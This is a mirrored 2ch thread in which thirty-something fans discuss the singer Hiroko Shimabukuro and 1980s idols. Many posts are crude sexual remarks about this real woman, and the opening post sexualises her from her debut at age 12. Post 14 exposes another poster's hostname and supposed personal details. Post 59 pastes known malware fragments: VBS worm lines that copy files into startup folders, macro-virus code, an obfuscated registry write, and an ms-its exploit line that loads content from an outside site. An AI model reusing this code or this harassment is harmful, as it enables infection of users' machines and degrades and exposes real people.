1read 100read
2012年07月30代102: ◆◆30代の心の安らぎ島袋寛子 hiroスレver.7◆◆ (683) TOP カテ一覧 スレ一覧 2ch元 削除依頼
朝鮮人=民主党=マスコミ=目的は日本侵略 (294)
今日使ったお金報告 (204)
     30代女性の便秘・浣腸     (795)
【派遣切り】30代でいくら借金ある?【ギャンブル】 (202)
薄毛が気になりだした30代 (597)
▼▼ 30代女性のアンダーヘアA ▼▼ (350)

◆◆30代の心の安らぎ島袋寛子 hiroスレver.7◆◆


1 :06/10 〜 最終レス :12/08
   
  祝!主演映画“バックダンサーズ”ヒット!
12歳でのデビュー時から歌とエロスのオーラを放ち、
その後成長とともにそのオーラを強めてきた島袋寛子。
今やその姿、いやその存在そのものが奇跡であり究極、まさに天使。
さあ、30代的視点から我らが女神島袋寛子を語れ!
☆hiro official☆
 http://www.avexnet.or.jp/hiro/
☆Coco d'Or official☆
 http://avexnet.or.jp/coco/
☆hiroタン画像☆
 http://bbs.avi.jp/24669/
 http://bbs.avi.jp/65320/
 http://bbs.avi.jp/65552/
 http://bbs.avi.jp/65560/
☆hiroスレ過去ログ倉庫☆
 http://jbbs.shitaraba.com/music/6392/hiro_speed.html
☆前スレ☆
◆◆30代の心の安らぎ島袋寛子 hiroスレver.6◆◆
http://bubble4.2ch.net/test/read.cgi/cafe30/1139979437/l50

2 :
hiroだ〜い好き!

3 :
新スレおめでとうございます。
またマッタリとhiroタンのことや昔話しをしましょう。

4 :
ツマンネ

5 :
昔話ってのがいいなw
これまでもhiroタンの話題から派生してなぜかガンダムやらヤマトやらに行ったっけ。

6 :
玉袋

7 :
会社でもそうだが昔のアニメ話しになると盛り上がるよなw

8 :
アニメ話か話大好き!

9 :
昔の曲の話しも好き

10 :
hiroタンもの話好きだといいな。

11 :
いいか???w

12 :

CD買って握手してもらった。
初めはウエハラが手を出してきたので払いのけて
hiroタンと握手に成功

13 :
その手で何をしたのか言ってごらん?
怒らないから、さあ。

14 :
>>1=12
          / ̄ ̄ ̄ ̄ ̄ ̄\
         | ○。         l  
        ノノ)            从  多香子みたいな美人がいるから、
       ( i从〓〓      〓〓从  hiroタンのブサイクさが目立つんだ。
      从从-=・=-      -=・=-从   悔しいから多香スレ荒らしてます…。 
      从从        l       从)   
      (从:.|.∴ヽ    ∨    /∴从人)
     (人人| ∴!  ー===-' !∴.|从人)  
     (.人人.| ∴!    ̄   !∴|从人)  
     (人人| ∴!        !∴|从人)  
     (人人人_______ 人人
         /     ゝ ── '   ヽ
         /   ,ィ -っ、        ヽ
        |  / 、__ う 人  ・ ,.y  i
        |    /        ̄ |  |
        ヽ、__ノ          ノ  ノ
          |      x    9  /
          |   ヽ、_  _,ノ 彡イ
          |     (U)    | 
上原スレに粘着してるキモhiroヲタの実態
固定ハンドル ココヒロ
年齢 30代
職業 無職(自称中間管理職、扶養家族3人)
都道府県 大阪府
ホスト名 zaq3d2e10c1.zaq.ne.jp
特技 taka.BRKを叩く(ホストを晒されたことが許せない)。上原多香子スレを荒らす(しかし全く相手にされない)。
趣味 レス削除依頼(マンセー以外は荒らしだと勘違いしている)。アンチにすぐレスする(大人なのにスルーも覚えられない)。
持論 レス数とhiroタンへの愛の大きさは比例する(2chにて24時間待機、無職で引き篭もりだから何時でも書き込める)。

15 :
hiroタンと握手したことないが、昔石川秀美と小泉今日子そして成清加奈子(知らんだろうなw)と握手したことある。
当時男子校に通ってた俺にとってあの柔らかくて小さな手は衝撃的だった。

16 :
で、その手でオ|握り締めた、と。

17 :
追い掛けてたアイドルの名前聞くと同年代だとわかるなあw

18 :
何気に最近のアイドルも追いかけてたりしますが?
綾瀬はるかなんていいね。
あとAKB48でいい子いないか物色中。
もちろんhiroタンは別格だけどね。

19 :
おちこぼれの巣

20 :
よく知らないのでAKB48調べてみた。
なんかすげぇ団体だなw

21 :
有線で聴いたことあるけど曲はなかなか良いよ。
プロデュースは秋元康で、なんとなくおニャン子を彷彿させるが。

22 :
スルーできない低脳hiroヲタが集うスレw

23 :
おニャンこネタもたまに出るねw

24 :
hiroって存在感ゼロだな。このスレでも・・
単に30代のが昔を懐かしむだけのすれじゃんw

25 :
>>23
おニャン子ネタになるとこの俺もちょっとうるさいよ。
と言っても初期の頃、せいぜい工藤静香ぐらいまでしか把握できてないが。。。

26 :
渡辺満里奈いいよね。

27 :
hiroタンがおニャン子クラブにはいってるのを想像してみた。
何気に萌えたw

28 :
オールナイターズは?
学生時代東京にに下宿してて毎週土曜日見てた。
懐かしい。。。

29 :
スレタイと無関係のレスが続くので削除依頼だしておきます。
hiroはキモヲタを憎んでるようだから、お前らは死んで下さい。

30 :
オールナイトフジね。
名前だけしか知らないけど。
流行ってる頃見たかったなあw

31 :
何気にhiroタンが生まれる前か生まれた頃の番組だよね。

32 :
結構ちゃんとしたアーティストがゲストライブやったりしてたから、番組あればhiroタンも出てたかもね。
しかし当時は海賊チャンネルとか過激な番組やってたよなあ。
テッシュタイムのコーナーとかw

33 :
そういえば昔島袋寛子とかいうブスが
男に溺れて、グループ解散に追い込んだよな
って語られる・・・それほどのネタでもないな
hiroレベルでは

34 :
ティッシュタイムかw
正式な名前忘れたがあったなあ。
hiroタンが出演してるとこ想像したらしてきた・・・

35 :
島袋が出演したら萎えたと苦情の嵐だったろうなw

36 :
オールナイトフジはうちの地方はやってなかった。
松本伊代が司会してことは知ってるが。

37 :
hiroより長澤まさみが好きになりました

38 :
長澤まさみかわいいよね。
でも最近の若い女優の中では綾瀬はるかが一番いいかな。
もちろんhiroタンには及ばないけど。

39 :
容姿だと
正直 長澤>綾瀬>>>>>>>>>>>>∞>>hiro
顔ではhiroは最低ランク

40 :
最近の若い子ねえ。
hiroタンを上回る子はやっぱいないな。

41 :
>>40
訂正
最近の若い子でhiroを下回る子はいないな。
ムキになってhiroを持ち上げるだけ虚しいヲタのレス・・・

42 :
島袋ばいいのに

43 :
>>40
なんだろ?
かわいい子はいるけど萌え方がhiroタンとは違うんだよな。
hiroタンのかわいさには愛があるんだよ。

44 :
hiro最高。30代半ばで嫁もいるけど、世界で一番いい女。

45 :
>>44
訂正
hiro最低。30代半ばでのヲタばかりいるけど、世界で一番醜い女。

46 :
とはいえ、hiroも芸能界引退だし。
ここのヲタも安らかに

47 :
キモ男とブス女の集うスレw

48 :
>>44
30代後半で嫁もいるけど、世界で一番いい女。
hiroタンと浮気してぇーよー

49 :
マジで最高だ。
こんなかわいい子に甘えながらおねだりされたら何でもしちゃいそう。
でもするときは反対におねだりして色々してもらいたいですな。

50 :
hiroタンとやれるなら何でもいいです。

51 :
hiroのどこがいいのかw
正直に言え、単なる意地だろw
顔は不細工・体も貧・性病もちで、今は
田中圭と松本の性欲処理機じゃんw

52 :
>>50
まあ、本音の部分はそうだけどな。
どうせ現実にはやれないんだし、それならより一層非現実的なことを妄想するのだよw

53 :
hiroタンと一日家の中でまったりした時間を過ごしたい。

54 :
実際に見たら肌はぼろぼろで
腋臭らしいな島袋寛子

55 :
明日から5日間出張だ〜
hiroタンの写真持って行かなきゃ

56 :
↑無職引きこもりの必死なうそレス
hiroの写真持って・・・寂しい奴だな
身近に女がいませんって宣言してるようなものだw

57 :
>>55
お仕事乙です。
hiroタン画像は仕事帰ってからの癒しアイテムとして出張時は必携だよね。

58 :
hiroタンの画像を持っていくのは癒しアイテムとしても役立つが、あとオナ(ry

59 :
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

60 :
俺もたまには出張行って羽伸ばしたいなあ。
昔はよくいったんだが。

61 :
今は引きこもりですかw

62 :
昔も出張なんか行ってないんだよ。
無職のhiroヲタの妄想レス。

63 :
バブルの頃は多かったよね。
今はよほどでなければ始発で行って日帰りだもんなあ・・・

64 :
太陽浴びて〜

65 :
最近のhiroは醜い。顔も態度も、性格も。
醜いねぇ。
安置にすれば昔から醜いということだけれども。

66 :
出張のお供にhiroタン
これ最強!

67 :
55の人、5日間ということは今日あたり帰ってくるのかな?
帰ったら出張中のhiroタンハァハァについてレポよろ。

68 :
帰ってきましたよ。
ハァハァはしてない。
出張つっても研修合宿で、会社の研修センターに5日間缶詰で夜の外出も一度もなし・・・
でも往復の車中の音楽と携帯の待ち受けでhiroタンとはずっと一緒でした。

69 :
アホが釣られて書いてる。ギャハハ

70 :
>>68
よく我慢できたねw

71 :
きっとその分帰ってから一気に(ry

72 :
もうhiroはあかんな。
情熱も魅力もなくなりましたわ。

73 :
>>71
一気に・・・曲を聴いた?

74 :
このスレもいらないね。

75 :
俺ってhiroタンで射精しなかった連続記録何日だろう?
5日空いたことはないはず。

76 :
おれは現実から逃げているだけのだめな人間なのでしょうか

77 :
hiroヲタは全員、現実社会から逃げてる哀れなだめ人間ですよ。

78 :
>>75
ていうか、5日も空いたことがあるのかとw
嫁とした日でもhiroタンで抜く日もあるし。。。

79 :
まああれだ。
日課みたいなもんだな。

80 :
日課てのはワラタw
そういえば以前、hiroタンで抜くのは毎日飯食うのと同じ感覚という書き込みを見たことあるけど同じ人かなw

81 :
>>80
全部お前の自演だろマヌケwwwwwwwwwww

82 :
なんかそういうこと書いた記憶もあるが・・・
一時期みんなそういうこと書いてたからねw

83 :
飯を食うというより呼吸するのと同じ感覚かと。

84 :
今日もいつもの奴の自演レスが続くなw

85 :
>>82-83
ワロタww

86 :
おもしろすぎ!

87 :
どこがおもしろいねん。よ、

88 :
飯食うのと同じ感覚で・・・
面白いなw
つか表現の仕方にユーモアあっていいねえ。

89 :
hiro活動停止オメ

90 :
ロダだが、1だけ繋がらないだけど・・・
なんでだろ?俺だけ?

91 :
繋がらん。
つか、ヌカのも繋がらないんだけど?

92 :
hiroめざわり

93 :
いつまでヌカに寄生してるんだよw
腐れアイドルが。
さっさと引退したらいいんだよ。

94 :
繋がった・・・
一日1回は寛ロダ見ないとねw

95 :
↑ば?
社会のゴミくずさんw

96 :
ロダが何か分からない人へ
 http://bbs.avi.jp/24669/
 http://bbs.avi.jp/65320/
 http://bbs.avi.jp/65552/
 http://bbs.avi.jp/65560/

97 :
寛ロダも一番古い投稿見ると2004年から2年以上も続いてるんやね。
以前は違う掲示板でもあったし、2ちゃん寛ロダの歴史ってすごい。

98 :
寛ロダの歴史=オイラのオナヌーの歴史

99 :
全部お前の自作自演だけれどなw
寛の需要はゼロ

100read 1read
1read 100read
TOP カテ一覧 スレ一覧 2ch元 削除依頼
クリスマスってどうやって過ごす?キュムキュム (341)
★Rが小さい30代★ (354)
おっさん世代がももいろクローバーZを語るスレ ☆24 (601)
■明大在学中の思い出 (315)
30代で年収1000万円超! (335)
夢のスパゲッティナポリタン 4皿目 (420)
--log9.info------------------
【PSP】STAR DRIVER 輝きのタクト 銀河美少年伝説6 (565)
【PSVITA】みんなのGOLF6 31H【みんゴル】 (371)
モンハンシリーズの世界観・設定を語るスレ24 (662)
【3DS版】カルドセプト Part84 (1001)
【3DS】カルチョビット 63Goal【GBA】 (286)
【PSVita】シェルノサージュ part150 (991)
【PSP】戦律のストラタス part4 (711)
ロックマンゼロコレクション mission325 (434)
【3DS】初音ミク Project mirai 58【SEGA】 (784)
PSP質問スレpart83 (201)
【PSP】ダンガンロンパ総合 Part112 (1001)
GBAこれだけは買っとけ (897)
【3DS】GUILD(ギルド)総合 Part05【レベル5】 (934)
【PSVITA】トロフィー取得スレ (438)
【3D】Newマリオ2 コインラッシュ専用スレ (512)
【PSP】とある科学の超電磁砲=レールガン 十一冊目 (811)
--log55.com------------------
掃除で人生変えたいと思う
【抜け毛】ペットを飼ってる人のお掃除事情【粗相】
●●捨て報告●● 24
ぬいぐるみが捨てられない
なんでもかんでも捨ててしまう病の奴 2 
エアコンクリーニング U
書いたら探し物が見つかるスレ 6
【押入れ】ためない・しまわない【スッカスカ】